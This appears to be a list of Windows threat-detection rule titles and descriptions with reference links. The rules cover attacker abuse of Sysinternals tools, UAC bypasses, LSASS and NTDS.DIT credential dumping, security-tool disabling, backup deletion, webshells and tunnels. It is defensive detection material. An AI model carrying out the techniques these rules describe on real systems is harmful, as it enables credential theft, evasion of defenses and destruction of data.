https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43, https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW, https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat, https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat |
Active Directory Database Snapshot Via ADExplorer |
Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database. |
https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html |
Suspicious Active Directory Database Snapshot Via ADExplorer |
Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database to a suspicious directory. |
https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html |
Potential Execution of Sysinternals Tools |
Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools |
https://twitter.com/Moti_B/status/1008587936735035392 |
Potential Memory Dumping Activity Via LiveKD |
Detects execution of LiveKD based on PE metadata or image name |
https://learn.microsoft.com/en-us/sysinternals/downloads/livekd |
Kernel Memory Dump Via LiveKD |
Detects execution of LiveKD with the "-m" flag to potentially dump the kernel memory |
https://learn.microsoft.com/en-us/sysinternals/downloads/livekd, https://4sysops.com/archives/creating-a-complete-memory-dump-without-a-blue-screen/, https://kb.acronis.com/content/60892 |
Procdump Execution |
Detects usage of the SysInternals Procdump utility |
https://learn.microsoft.com/en-us/sysinternals/downloads/procdump |
Potential SysInternals ProcDump Evasion |
Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name |
https://twitter.com/mrd0x/status/1480785527901204481 |
Potential LSASS Process Dump Via Procdump |
Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process.
This way we are also able to catch cases in which the attacker has renamed the procdump executable.
|
https://learn.microsoft.com/en-us/sysinternals/downloads/procdump |
Psexec Execution |
Detects user accept agreement execution in psexec commandline |
https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html |
PsExec/PAExec Escalation to LOCAL SYSTEM |
Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights |
https://learn.microsoft.com/en-us/sysinternals/downloads/psexec, https://www.poweradmin.com/paexec/, https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html |
Potential PsExec Remote Execution |
Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility |
https://learn.microsoft.com/en-us/sysinternals/downloads/psexec, https://www.poweradmin.com/paexec/, https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html |
PsExec Service Child Process Execution as LOCAL SYSTEM |
Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account) |
https://learn.microsoft.com/en-us/sysinternals/downloads/psexec |
PsExec Service Execution |
Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution |
https://learn.microsoft.com/en-us/sysinternals/downloads/psexec, https://www.youtube.com/watch?v=ro2QuZTIMBM |
Suspicious Use of PsLogList |
Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs |
https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/, https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos, https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList, https://twitter.com/EricaZelic/status/1614075109827874817 |
Sysinternals PsService Execution |
Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering |
https://learn.microsoft.com/en-us/sysinternals/downloads/psservice |
Sysinternals PsSuspend Execution |
Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes |
https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend, https://twitter.com/0gtweet/status/1638069413717975046 |
Sysinternals PsSuspend Suspicious Execution |
Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses |
https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend, https://twitter.com/0gtweet/status/1638069413717975046 |
Potential File Overwrite Via Sysinternals SDelete |
Detects the use of SDelete to erase a file not the free space |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md |
Potential Privilege Escalation To LOCAL SYSTEM |
Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges |
https://learn.microsoft.com/en-us/sysinternals/downloads/psexec, https://www.poweradmin.com/paexec/, https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html |
Sysmon Configuration Update |
Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely |
https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon |
Uninstall Sysinternals Sysmon |
Detects the removal of Sysmon, which could be a potential attempt at defense evasion |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon |
Potential Binary Impersonating Sysinternals Tools |
Detects binaries that use the same name as legitimate sysinternals tools to evade detection |
https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite |
Sysprep on AppData Folder |
Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec) |
https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets, https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b |
Suspicious Execution of Systeminfo |
Detects usage of the "systeminfo" command to retrieve information |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo |
Potential Signing Bypass Via Windows Developer Features |
Detects when a user enable developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages. |
Internal Research, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ |
Suspicious Recursive Takeown |
Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/takeown, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility |
Tap Installer Execution |
Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques |
https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers |
Compressed File Creation Via Tar.EXE |
Detects execution of "tar.exe" in order to create a compressed file.
Adversaries may abuse various utilities to compress or encrypt data before exfiltration.
|
https://unit42.paloaltonetworks.com/chromeloader-malware/, https://lolbas-project.github.io/lolbas/Binaries/Tar/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage |
Compressed File Extraction Via Tar.EXE |
Detects execution of "tar.exe" in order to extract compressed file.
Adversaries may abuse various utilities in order to decompress data to avoid detection.
|
https://unit42.paloaltonetworks.com/chromeloader-malware/, https://lolbas-project.github.io/lolbas/Binaries/Tar/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage |
Taskkill Symantec Endpoint Protection |
Detects one of the possible scenarios for disabling Symantec Endpoint Protection.
Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.
As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.
|
https://www.exploit-db.com/exploits/37525, https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection, https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer |
Loaded Module Enumeration Via Tasklist.EXE |
Detects the enumeration of a specific DLL or EXE being used by a binary via "tasklist.exe".
This is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question.
In order to dump the process memory or perform other nefarious actions.
|
https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/, https://pentestlab.blog/tag/svchost/ |
Taskmgr as LOCAL_SYSTEM |
Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM |
Internal Research |
New Process Created Via Taskmgr.EXE |
Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC |
https://twitter.com/ReneFreingruber/status/1172244989335810049 |
Potentially Suspicious Command Targeting Teams Sensitive Files |
Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams.
The database might contain authentication tokens and other sensitive information about the logged in accounts.
|
https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/, https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens |
Suspicious TSCON Start as SYSTEM |
Detects a tscon.exe start as LOCAL SYSTEM |
http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html, https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6, https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement |
New Virtual Smart Card Created Via TpmVscMgr.EXE |
Detects execution of "Tpmvscmgr.exe" to create a new virtual smart card. |
https://learn.microsoft.com/en-us/windows/security/identity-protection/virtual-smart-cards/virtual-smart-card-tpmvscmgr |
Bypass UAC via CMSTP |
Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files |
https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md, https://lolbas-project.github.io/lolbas/Binaries/Cmstp/ |
Suspicious RDP Redirect Using TSCON |
Detects a suspicious RDP session redirect using tscon.exe |
http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html, https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6, https://www.hackingarticles.in/rdp-session-hijacking-with-tscon/ |
UAC Bypass Using Disk Cleanup |
Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34) |
https://github.com/hfiref0x/UACME |
UAC Bypass Using ChangePK and SLUI |
Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61) |
https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b, https://github.com/hfiref0x/UACME, https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf |
CMSTP UAC Bypass via COM Object Access |
Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65) |
https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/, https://twitter.com/hFireF0X/status/897640081053364225, https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf, https://github.com/hfiref0x/UACME |
UAC Bypass Tools Using ComputerDefaults |
Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59) |
https://github.com/hfiref0x/UACME |
Potential RDP Session Hijacking Activity |
Detects potential RDP Session Hijacking activity on Windows systems |
https://twitter.com/Moti_B/status/909449115477659651 |
UAC Bypass Using Consent and Comctl32 - Process |
Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22) |
https://github.com/hfiref0x/UACME |
UAC Bypass Using DismHost |
Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63) |
https://github.com/hfiref0x/UACME |
Bypass UAC via Fodhelper.exe |
Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes. |
https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md |
UAC Bypass Using Event Viewer RecentViews |
Detects the pattern of UAC Bypass using Event Viewer RecentViews |
https://twitter.com/orange_8361/status/1518970259868626944, https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute |
UAC Bypass Using NTFS Reparse Point - Process |
Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36) |
https://github.com/hfiref0x/UACME |
UAC Bypass via ICMLuaUtil |
Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface |
https://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html |
UAC Bypass Using IDiagnostic Profile |
Detects the "IDiagnosticProfileUAC" UAC bypass technique |
https://github.com/Wh04m1001/IDiagnosticProfileUAC |
UAC Bypass Using IEInstal - Process |
Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64) |
https://github.com/hfiref0x/UACME |
UAC Bypass via Windows Firewall Snap-In Hijack |
Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in |
https://www.elastic.co/guide/en/security/current/uac-bypass-via-windows-firewall-snap-in-hijack.html#uac-bypass-via-windows-firewall-snap-in-hijack |
UAC Bypass Using MSConfig Token Modification - Process |
Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55) |
https://github.com/hfiref0x/UACME |
UAC Bypass Using PkgMgr and DISM |
Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23) |
https://github.com/hfiref0x/UACME |
Potential UAC Bypass Via Sdclt.EXE |
A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques. |
https://github.com/OTRF/detection-hackathon-apt29/issues/6, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md |
TrustedPath UAC Bypass Pattern |
Detects indicators of a UAC bypass method by mocking directories |
https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e, https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows, https://github.com/netero1010/TrustedPath-UACBypass-BOF |
UAC Bypass Abusing Winsat Path Parsing - Process |
Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) |
https://github.com/hfiref0x/UACME |
UAC Bypass Using Windows Media Player - Process |
Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) |
https://github.com/hfiref0x/UACME |
Bypass UAC via WSReset.exe |
Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes. |
https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html, https://lolbas-project.github.io/lolbas/Binaries/Wsreset/, https://www.activecyber.us/activelabs/windows-uac-bypass, https://twitter.com/ReaQta/status/1222548288731217921 |
UAC Bypass WSReset |
Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config |
https://lolbas-project.github.io/lolbas/Binaries/Wsreset/, https://github.com/hfiref0x/UACME, https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf |
Use of UltraVNC Remote Access Software |
An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks |
https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1219/T1219.md |
Suspicious UltraVNC Execution |
Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group) |
https://web.archive.org/web/20220224045756/https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine, https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution, https://uvnc.com/docs/uvnc-viewer/52-ultravnc-viewer-commandline-parameters.html |
Uninstall Crowdstrike Falcon Sensor |
Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md |
Windows Credential Manager Access via VaultCmd |
List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.004/T1555.004.md#atomic-test-1---access-saved-credentials-via-vaultcmd |
Uncommon Userinit Child Process |
Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence. |
https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html, https://learn.microsoft.com/en-us/windows-server/administration/server-core/server-core-sconfig#powershell-is-the-default-shell-on-server-core |
Verclsid.exe Runs COM Object |
Detects when verclsid.exe is used to run COM object via GUID |
https://lolbas-project.github.io/lolbas/Binaries/Verclsid/, https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5, https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ |
Detect Virtualbox Driver Installation OR Starting Of VMs |
Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM. |
https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/, https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/ |
Suspicious VBoxDrvInst.exe Parameters |
Detect VBoxDrvInst.exe run with parameters allowing processing INF file.
This allows to create values in the registry and install drivers.
For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys
|
https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml, https://twitter.com/pabraeken/status/993497996179492864 |
Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script |
Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state |
https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/, https://www.hexacorn.com/blog/2017/01/14/beyond-good-ol-run-key-part-53/ |
Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script |
Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state |
https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/ |
VMToolsd Suspicious Child Process |
Detects suspicious child process creations of VMware Tools process which may indicate persistence setup |
https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/, https://user-images.githubusercontent.com/61026070/136518004-b68cce7d-f9b8-4e9a-9b7b-53b1568a9a94.png, https://github.com/vmware/open-vm-tools/blob/master/open-vm-tools/tools.conf |
Potentially Suspicious Child Process Of VsCode |
Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles. |
https://twitter.com/nas_bench/status/1618021838407495681, https://twitter.com/nas_bench/status/1618021415852335105 |
Visual Studio Code Tunnel Execution |
Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel |
https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html, https://code.visualstudio.com/docs/remote/tunnels |
Visual Studio Code Tunnel Shell Execution |
Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system. |
https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html, https://code.visualstudio.com/docs/remote/tunnels |
Renamed Visual Studio Code Tunnel Execution |
Detects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel |
https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html, https://code.visualstudio.com/docs/remote/tunnels |
Visual Studio Code Tunnel Service Installation |
Detects the installation of VsCode tunnel (code-tunnel) as a service. |
https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html, https://code.visualstudio.com/docs/remote/tunnels |
Potential Binary Proxy Execution Via VSDiagnostics.EXE |
Detects execution of "VSDiagnostics.exe" with the "start" command in order to launch and proxy arbitrary binaries. |
https://twitter.com/0xBoku/status/1679200664013135872 |
Suspicious Vsls-Agent Command With AgentExtensionPath Load |
Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter |
https://twitter.com/bohops/status/1583916360404729857 |
Use of W32tm as Timer |
When configured with suitable command line arguments, w32tm can act as a delay mechanism |
https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md, https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains |
Wab Execution From Non Default Location |
Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity |
https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime, https://thedfirreport.com/2022/09/26/bumblebee-round-two/ |
Wab/Wabmig Unusual Parent Or Child Processes |
Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity |
https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime, https://thedfirreport.com/2022/09/26/bumblebee-round-two/ |
All Backups Deleted Via Wbadmin.EXE |
Detects the deletion of all backups or system state backups via "wbadmin.exe".
This technique is used by numerous ransomware families and actors.
This may only be successful on server platforms that have Windows Backup enabled.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell, https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md, https://www.sentinelone.com/labs/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/, https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted, https://www.trendmicro.com/content/dam/trendmicro/global/en/research/24/b/lockbit-attempts-to-stay-afloat-with-a-new-version/technical-appendix-lockbit-ng-dev-analysis.pdf, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-systemstatebackup |
Windows Backup Deleted Via Wbadmin.EXE |
Detects the deletion of backups or system state backups via "wbadmin.exe".
This technique is used by numerous ransomware families and actors.
This may only be successful on server platforms that have Windows Backup enabled.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell, https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md, https://www.sentinelone.com/labs/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/, https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted, https://www.trendmicro.com/content/dam/trendmicro/global/en/research/24/b/lockbit-attempts-to-stay-afloat-with-a-new-version/technical-appendix-lockbit-ng-dev-analysis.pdf, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-systemstatebackup |
Sensitive File Dump Via Wbadmin.EXE |
Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive.
Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
|
https://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Wbadmin.yml, https://lolbas-project.github.io/lolbas/Binaries/Wbadmin/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-recovery, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-backup |
File Recovery From Backup Via Wbadmin.EXE |
Detects the recovery of files from backups via "wbadmin.exe".
Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials.
|
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-recovery, https://lolbas-project.github.io/lolbas/Binaries/Wbadmin/ |
Sensitive File Recovery From Backup Via Wbadmin.EXE |
Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive.
Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
|
https://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Wbadmin.yml, https://lolbas-project.github.io/lolbas/Binaries/Wbadmin/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-recovery, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-backup |
Potentially Suspicious WebDAV LNK Execution |
Detects possible execution via LNK file accessed on a WebDAV server. |
https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html, https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462 |
Chopper Webshell Process Pattern |
Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells |
https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/ |
Webshell Hacking Activity Patterns |
Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system
|
https://youtu.be/7aemGhaE9ds?t=641 |
Webshell Detection With Command Line Keywords |
Detects certain command line parameters often used during reconnaissance activity via web shells |
https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html, https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/, https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild |
Suspicious Process By Web Server Process |
Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation
|
https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF |
Potential Credential Dumping Via WER |
Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass |
https://github.com/deepinstinct/Lsass-Shtinkering, https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf |
Webshell Tool Reconnaissance Activity |
Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands
|
https://ragged-lab.blogspot.com/2020/07/webshells-automating-reconnaissance.html |
Potential ReflectDebugger Content Execution Via WerFault.EXE |
Detects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow |
https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html, https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/ |
Suspicious Child Process Of Wermgr.EXE |
Detects suspicious Windows Error Reporting manager (wermgr.exe) child process |
https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html, https://www.echotrail.io/insights/search/wermgr.exe, https://github.com/binderlabs/DirCreate2System |
Suspicious Execution Location Of Wermgr.EXE |
Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location. |
https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html, https://www.echotrail.io/insights/search/wermgr.exe, https://github.com/binderlabs/DirCreate2System |
Suspicious File Download From IP Via Wget.EXE |
Detects potentially suspicious file downloads directly from IP addresses using Wget.exe |
https://www.gnu.org/software/wget/manual/wget.html |
Suspicious File Download From File Sharing Domain Via Wget.EXE |
Detects potentially suspicious file downloads from file sharing domains using wget.exe |
